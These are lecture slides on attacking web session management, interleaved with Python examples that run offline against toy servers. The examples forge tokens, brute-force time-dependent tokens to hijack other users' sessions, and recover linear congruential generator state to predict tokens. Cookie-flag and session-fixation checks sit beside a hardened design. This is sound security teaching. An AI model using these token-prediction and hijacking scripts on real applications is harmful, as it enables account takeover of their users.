Transcript Chapter 7

Chapter 7
Attacking Session Management
Juliette Lessing
Session management
• Enables the application to uniquely identify a given user across a number of different requests.
• Prime target for malicious attacks against the application.
• Defects are commonly encountered in real applications.
Two types of weaknesses
• Weaknesses in Session Token
Generation
• Weaknesses in the handling of session
tokens throughout their lifecycle.
Weaknesses in Session Token
Generation
• Meaningful tokens (1)
• Created using a transformation of the user's user name or other information associated with them.
Meaningful tokens (2)
• Exhibit some structure allowing an attacker to understand their function and means of generation. The structure is often hidden only by an encoding such as hex or Base64, which is trivially reversed.
• Components commonly found in the token:
• User name
• E-mail address
• Client's IP address
Meaningful tokens (3)
Hack steps:
• Obtain a single token from the application and modify it to determine validity. Change the token's value one byte at a time and check whether the application still accepts it. If some portions are not required to be correct, exclude them from further analysis.
• Log in as several different users at different times and record the tokens received from the server.
• Analyze the tokens for any correlations that appear to be related to the username and other user-controllable data.
• Analyze the tokens for any detectable encoding or obfuscation.
• If any meaning can be reverse engineered from the sample of session tokens, guess the tokens, find a page of the application that is session-dependent, and make large numbers of requests to this page using these guessed tokens. Monitor the results for any cases where the page is loaded correctly, indicating a valid session token.
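The steps above, run end to end against a constructed toy target. This is an added example, not code from the slides or from the book they summarise; the target application, its users, the `user:ip:counter` token layout and the hex encoding are all assumptions chosen so that the byte-at-a-time probing, the decoding and the guessing of another user's token can be seen working offline.

```python
import binascii

HEX_DIGITS = "0123456789abcdef"


class MeaningfulTokenServer:
    """Constructed toy target (assumption, not a real application): the session
    token is hex("<user>:<client ip>:<counter>"). The server checks the user
    name and the counter but never looks at the IP portion."""

    def __init__(self):
        self.counter = 1000
        self.sessions = {}  # counter -> user name

    def login(self, user, ip):
        self.counter += 1
        self.sessions[self.counter] = user
        return binascii.hexlify(f"{user}:{ip}:{self.counter}".encode()).decode()

    def whoami(self, token):
        """Session-dependent page: returns the user the token authenticates,
        or None if the token is rejected."""
        try:
            raw = binascii.unhexlify(token).decode("latin-1")
            user, _ip, ctr = raw.split(":")
            ctr = int(ctr)
        except (binascii.Error, ValueError):
            return None
        return user if self.sessions.get(ctr) == user else None


def free_positions(token, is_valid):
    """Step 1: vary the token one hex digit at a time. A position is 'free' if
    at least one substitution still yields a token the application accepts;
    runs of free positions mark portions the server does not check."""
    free = []
    for i, ch in enumerate(token):
        for sub in HEX_DIGITS:
            if sub != ch and is_valid(token[:i] + sub + token[i + 1:]):
                free.append(i)
                break
    return free


def decode_token(token):
    """Step 4: the obvious encoding here is hex; decoding exposes the layout."""
    return binascii.unhexlify(token).decode("latin-1")


def guess_token(server, target_user, counter_lo, counter_hi):
    """Step 5: rebuild tokens for the target user over a range of counter
    values (the IP portion is free, so any value will do) and try each against
    the session-dependent page until one is accepted."""
    for ctr in range(counter_lo, counter_hi + 1):
        candidate = binascii.hexlify(f"{target_user}:0.0.0.0:{ctr}".encode()).decode()
        if server.whoami(candidate) == target_user:
            return candidate
    return None


if __name__ == "__main__":
    server = MeaningfulTokenServer()
    mine = server.login("alice", "10.0.0.5")   # the attacker's own session
    server.login("admin", "10.0.0.9")          # an administrator logs in later
    print(decode_token(mine))
    print(free_positions(mine, lambda t: server.whoami(t) == "alice"))
    print(guess_token(server, "admin", 1001, 1010))
```

The free positions reported for the attacker's own token are exactly the hex digits of the IP address, which tells the attacker that only the user name and the counter need to be right when forging a token for `admin`.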
Weaknesses in Session Token
Generation
Predictable tokens (1)
• Contain sequences or patterns
• Arise from 3 different sources:
1. Concealed sequences
2. Time dependency
3. Weak random number generation
Predictable tokens (2)
1. Concealed sequences




Predictable tokens (2)
2. Time dependency
The token in this example consists of two numbers: a counter that increments with every token issued, and a time-dependent value. Attack:
• Start polling the server to obtain new session tokens in quick succession.
• Monitor the increments in the first number. Does it increase by more than one between two of our tokens? Then a token has been issued to another user in between.
• We know the upper and lower bounds of the second number that was issued to them: it lies between the values in the tokens we received immediately before and after.
• Brute-force that small range of candidate tokens against a protected page until one is accepted.
• Running this scripted attack continuously will enable us to capture the session token of every other application user.
• When an administrative user logs in, we will fully compromise the entire application.
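The polling attack as a runnable simulation. This is an added example and not code from the slides; the `<counter>-<millisecond timestamp>` token format, the toy server, the user names and the deterministic fake clock are assumptions. The attacker only ever sees its own two tokens and derives the victim's token from the gap between them.

```python
class TimeDependentTokenServer:
    """Constructed toy target (assumption): token = "<counter>-<ms timestamp>".
    The clock is injected so that the run is deterministic."""

    def __init__(self, clock, start_counter=3124538):
        self.clock = clock
        self.counter = start_counter
        self.sessions = {}  # token -> user

    def issue(self, user):
        self.counter += 1
        token = f"{self.counter}-{self.clock()}"
        self.sessions[token] = user
        return token

    def protected_page(self, token):
        """Returns the owner of a valid session token, else None."""
        return self.sessions.get(token)


def parse(token):
    counter, stamp = token.split("-")
    return int(counter), int(stamp)


def hijack_between(server, before, after):
    """Given two of our own tokens, enumerate every token that could have been
    issued between them: counters strictly between ours and timestamps bounded
    by ours. Each candidate is tried against a protected page."""
    c0, t0 = parse(before)
    c1, t1 = parse(after)
    found, attempts = [], 0
    for counter in range(c0 + 1, c1):        # empty unless the counter jumped by more than one
        for stamp in range(t0, t1 + 1):       # the timestamp lies between our two polls
            attempts += 1
            candidate = f"{counter}-{stamp}"
            owner = server.protected_page(candidate)
            if owner is not None:
                found.append((candidate, owner))
    return found, attempts


class FakeClock:
    """Constructed millisecond clock advancing a fixed step per call."""

    def __init__(self, start=1_700_000_000_000, step=17):
        self.now, self.step = start, step

    def __call__(self):
        self.now += self.step
        return self.now


def run_demo():
    """Attacker polls, two other users log in, attacker polls again."""
    server = TimeDependentTokenServer(FakeClock())
    before = server.issue("attacker")
    server.issue("victim")
    server.issue("admin")
    after = server.issue("attacker")
    return hijack_between(server, before, after)


if __name__ == "__main__":
    found, attempts = run_demo()
    print(f"{len(found)} sessions hijacked in {attempts} requests: {found}")
```

With a 17 ms gap between token issues the search space is two counter values times 52 candidate timestamps, so every session issued between the two polls is recovered in about a hundred requests; a real server issuing tokens over seconds rather than milliseconds only changes the size of that window.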
Predictable tokens (3)
3. Weak random number generation
Example: a linear congruential generator. This algorithm takes the last number generated, multiplies it by one constant, and adds another constant, to obtain the next number. The number is truncated to 48 bits, and the algorithm shifts the result to return the specific number of bits requested by the caller. Because the whole internal state is only 48 bits and most of it is exposed in every output, an attacker who observes a couple of consecutive tokens can recover the state and predict every token issued afterwards.
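The state-recovery attack against the generator described above, as an added example that is not part of the slides. The constants are those of `java.util.Random`, whose algorithm matches the description; the slide itself does not name an implementation, so that match is an assumption, and tokens are taken to be the 32-bit outputs of the generator (the unsigned form is used here to keep the arithmetic simple).

```python
MULT = 0x5DEECE66D
ADD = 0xB
MASK = (1 << 48) - 1


class Lcg48:
    """The generator on the slide: multiply, add, truncate to 48 bits, return
    the top `bits` bits. Constants are java.util.Random's (assumption)."""

    def __init__(self, seed):
        self.state = (seed ^ MULT) & MASK   # Java scrambles the seed this way

    @classmethod
    def from_state(cls, state):
        rng = cls.__new__(cls)
        rng.state = state
        return rng

    def next_bits(self, bits):
        self.state = (self.state * MULT + ADD) & MASK   # multiply, add, truncate
        return self.state >> (48 - bits)                 # shift out the requested top bits

    def next_token(self):
        """A 32-bit token, i.e. the top 32 of the 48 state bits."""
        return self.next_bits(32)


def recover_states(out1, out2):
    """Two consecutive 32-bit outputs reveal 32 of the 48 state bits each. Brute
    force the 16 hidden bits of the first state and keep every candidate that
    steps to the second output. Returns the candidate states *after* out2."""
    candidates = []
    for low in range(1 << 16):
        state = (out1 << 16) | low
        nxt = (state * MULT + ADD) & MASK
        if nxt >> 16 == out2:
            candidates.append(nxt)
    return candidates


def predict_next(state, n):
    """Run the generator forward from a recovered state."""
    rng = Lcg48.from_state(state)
    return [rng.next_token() for _ in range(n)]


def predict_tokens(out1, out2, n):
    """Observe two tokens, predict the next n. Raises if the hidden bits are
    ambiguous (rare; a third observation would then settle it)."""
    states = recover_states(out1, out2)
    if len(states) != 1:
        raise ValueError(f"{len(states)} candidate states; need another observation")
    return predict_next(states[0], n)


if __name__ == "__main__":
    rng = Lcg48(2024)
    seen = [rng.next_token() for _ in range(2)]
    print("observed:", seen)
    print("predicted next:", predict_tokens(seen[0], seen[1], 3))
    print("actual next:   ", [rng.next_token() for _ in range(3)])
```

The 65,536-iteration search runs in well under a second; the same idea applies to any generator whose full state is small and largely exposed by its outputs.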
Weaknesses in Session Token
Handling
Disclosure of tokens on the network (1)
Weaknesses occur when:
• Some applications elect to use HTTPS to protect the user's credentials during login but then revert to HTTP for the remainder of the user's session, so the authenticated token crosses the network in the clear.
• Some applications use HTTP for preauthenticated areas of the site, such as the site's front page, but switch to HTTPS from the login page onwards. If the token issued over HTTP is kept after login, it has already been exposed.
Disclosure of tokens on the network (2)
Hack steps:
• Walk through the application in the normal way and identify login functions and transitions between HTTP and HTTPS communications.
• Are HTTP cookies used as the transmission mechanism? Verify whether the secure flag is set.
• Determine whether session tokens are ever transmitted over an unencrypted connection. If yes, regard them as vulnerable to interception.
• Verify whether a new token is issued following login, or whether a token transmitted during the HTTP stage is still being used to track the user's authenticated session.
• Verify whether the server is listening on port 80. If so, visit any HTTP URL directly from within an authenticated session and verify whether the session token is transmitted.
• In cases where a token for an authenticated session is transmitted to the server over HTTP, verify whether that token continues to be valid or is immediately terminated by the server.
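An offline check for the second and fourth steps above: parse the `Set-Cookie` headers of the response received before login and the one received after login, report a session cookie without the `Secure` flag (it will be sent over HTTP) or without `HttpOnly`, and report when no fresh token is issued at login. This is an added example, not code from the slides; the two raw HTTP responses are constructed here and the cookie name `SESSIONID` is an assumption.

```python
def parse_set_cookie(header_value):
    """Split a Set-Cookie value into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip() if v else True   # flags like Secure have no value
    return name.strip(), value, attrs


def set_cookies(raw_response):
    """Every Set-Cookie header in a raw HTTP response (body is ignored)."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    cookies = []
    for line in head.split("\r\n")[1:]:            # skip the status line
        k, _, v = line.partition(":")
        if k.strip().lower() == "set-cookie":
            cookies.append(parse_set_cookie(v.strip()))
    return cookies


def audit(pre_login_response, post_login_response, session_cookie):
    """Findings about how `session_cookie` is handled across the login step."""
    pre = {n: (v, a) for n, v, a in set_cookies(pre_login_response)}
    post = {n: (v, a) for n, v, a in set_cookies(post_login_response)}
    findings = []
    for stage, cookies in (("pre-login", pre), ("post-login", post)):
        if session_cookie in cookies:
            _, attrs = cookies[session_cookie]
            if "secure" not in attrs:
                findings.append(f"{stage}: {session_cookie} lacks Secure; it will be sent over HTTP")
            if "httponly" not in attrs:
                findings.append(f"{stage}: {session_cookie} lacks HttpOnly; script can read it")
    if session_cookie in pre and session_cookie not in post:
        findings.append(f"no new {session_cookie} at login; the pre-authentication token is reused")
    elif session_cookie in pre and session_cookie in post and pre[session_cookie][0] == post[session_cookie][0]:
        findings.append(f"{session_cookie} re-issued with the same value at login")
    return findings


# Constructed responses: an HTTP front page that sets the token, then a login
# redirect that sets nothing (the weak pattern), beside a hardened pair.
WEAK_PRE = ("HTTP/1.1 200 OK\r\n"
            "Set-Cookie: SESSIONID=a1b2c3; Path=/\r\n"
            "Content-Type: text/html\r\n\r\n<html>front page</html>")
WEAK_POST = "HTTP/1.1 302 Found\r\nLocation: /account\r\n\r\n"
GOOD_PRE = ("HTTP/1.1 200 OK\r\n"
            "Set-Cookie: SESSIONID=a1b2c3; Path=/; Secure; HttpOnly\r\n\r\n")
GOOD_POST = ("HTTP/1.1 302 Found\r\n"
             "Set-Cookie: SESSIONID=9f8e7d; Path=/; Secure; HttpOnly\r\n"
             "Location: /account\r\n\r\n")

if __name__ == "__main__":
    for f in audit(WEAK_PRE, WEAK_POST, "SESSIONID"):
        print("weak:", f)
    print("hardened:", audit(GOOD_PRE, GOOD_POST, "SESSIONID") or "no findings")
```

In practice the two responses come from a proxy capture of the real application; the check is deliberately simple, since the point is that the decisive evidence (flag present or absent, token changed or not) sits in two headers.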
Weaknesses in Session Token
Handling
Disclosure of tokens in logs
• Session tokens can end up in system logs that are far less well protected than the application itself. The usual cause is a token carried in the URL query string: it is then recorded in browser history, in web server and proxy logs, and leaks to other sites in the Referer header.
Weaknesses in Session Token
Handling
Vulnerable session termination (1)
• Some applications do not provide effective logout functionality:
• A logout function is not implemented.
• The logout function does not actually cause the server to invalidate the session.
• When a user clicks Logout, this fact is not communicated to the server at all (for example, only the cookie is discarded on the client), and so the server performs no action whatsoever.
Vulnerable session termination (2)
Hack steps:
• Investigate whether session expiration is implemented on the
server side
• Determine whether a logout function exists and is prominently
made available to users. If not, users are more vulnerable
because they have no means of causing the application to
invalidate their session.
• Where a logout function is provided, test its effectiveness.
After logging out, attempt to reuse the old token and
determine whether it is still valid. If so, users remain
vulnerable to some session hijacking attacks even after they
have “logged out.”
Weaknesses in Session Token
Handling
Client Exposure to Token Hijacking
Hack steps (1):
• Identify any cross-site scripting vulnerabilities within the application and determine whether these can be exploited to capture the session tokens of other users.
• If the application issues session tokens to unauthenticated users, obtain a token and perform a login. If the application does not issue a fresh token after a successful login, it is vulnerable to session fixation.
Hack steps (2):
• Check whether the application is willing to return to the login page even though you are already authenticated. If so, submit another login as a different user using the same token. If it does not issue a fresh token, it is vulnerable to session fixation.
• Identify the format of session tokens used by the application. Modify your token to an invented value that is validly formed, and attempt to log in. If the application allows you to create an authenticated session using an invented token, it is vulnerable to session fixation.
Securing Session Management
In order to perform session management in a secure manner:
1. Generate strong tokens
2. Protect tokens throughout their lifecycle
• Tokens should only ever be transmitted over HTTPS (set the secure flag on the cookie).
• Tokens should never be transmitted in the URL.
• Logout functionality should be implemented, and it must invalidate the session on the server.
• Session expiration should be implemented after a suitable period of inactivity (e.g., 10 minutes).
• Etc.
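One added example serves the three preceding passages (vulnerable session termination, the session fixation hack steps, and the securing checklist): a deliberately weak session store beside a hardened one, and a probe that runs the slides' tests against each. This is not code from the slides; the session-store API (`start`, `login`, `logout`, `user_for`), the user table, the attacker-chosen token and the clock passed in as an integer are assumptions made so that the checks run offline.

```python
import secrets

USERS = {"alice": "pw-alice", "admin": "pw-admin"}   # constructed credentials


class WeakSessionStore:
    """Constructed example of the weaknesses above: accepts any well-formed
    token the client presents, keeps it across login, has no server-side
    logout and no expiry."""

    def __init__(self):
        self.sessions = {}   # token -> {"user": str | None, "last": int}

    def start(self, clock, token=None):
        token = token or secrets.token_hex(16)
        self.sessions.setdefault(token, {"user": None, "last": clock})
        return token

    def login(self, token, user, password, clock):
        if USERS.get(user) != password:
            return None
        self.sessions.setdefault(token, {"user": None, "last": clock})
        self.sessions[token]["user"] = user
        return token                                  # same token after login: fixation

    def logout(self, token, clock):
        pass                                          # never reaches the server

    def user_for(self, token, clock):
        s = self.sessions.get(token)
        return s["user"] if s else None               # no idle check


class HardenedSessionStore:
    IDLE_LIMIT = 10 * 60   # seconds of inactivity before the session dies

    def __init__(self):
        self.sessions = {}

    def start(self, clock, token=None):
        token = secrets.token_urlsafe(32)            # client-supplied tokens are ignored
        self.sessions[token] = {"user": None, "last": clock}
        return token

    def login(self, token, user, password, clock):
        if USERS.get(user) != password:
            return None
        self.sessions.pop(token, None)               # kill the pre-authentication session
        new = secrets.token_urlsafe(32)              # fresh, strong token after login
        self.sessions[new] = {"user": user, "last": clock}
        return new

    def logout(self, token, clock):
        self.sessions.pop(token, None)               # server-side invalidation

    def user_for(self, token, clock):
        s = self.sessions.get(token)
        if s is None:
            return None
        if clock - s["last"] > self.IDLE_LIMIT:
            del self.sessions[token]                 # idle expiry
            return None
        s["last"] = clock
        return s["user"]


def probe(store):
    """Run the slides' checks against a store; each True is a vulnerability."""
    t = 1_000_000                                    # constructed clock, in seconds
    fixed = "deadbeef" * 4                           # attacker-chosen, validly formed token
    tok = store.start(t, token=fixed)                # the victim arrives carrying it
    after = store.login(tok, "alice", "pw-alice", t)
    findings = {
        "no fresh token after login": after == tok,
        "attacker-chosen token authenticates": store.user_for(fixed, t) == "alice",
    }
    store.logout(after, t)
    findings["token still valid after logout"] = store.user_for(after, t) == "alice"
    tok2 = store.start(t)
    after2 = store.login(tok2, "alice", "pw-alice", t)
    findings["no idle expiry"] = store.user_for(after2, t + 11 * 60) == "alice"
    return findings


if __name__ == "__main__":
    for name, store in (("weak", WeakSessionStore()), ("hardened", HardenedSessionStore())):
        print(name, probe(store))
```

The hardened store mints its own token with `secrets` (strong generation), replaces it at login (defeats fixation), deletes it on logout, and drops it after the idle limit; every one of those is visible as a flipped entry in the probe's output.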
Securing Session Management
Per-page Tokens
• A new token is issued every time the user requests an application page; a request that presents an earlier token is rejected.
• Prevents session fixation attacks and makes a captured token useless as soon as the legitimate user makes another request.
• Caveat: this breaks the browser's Back button and multi-tab use, so it is usually reserved for high-security applications.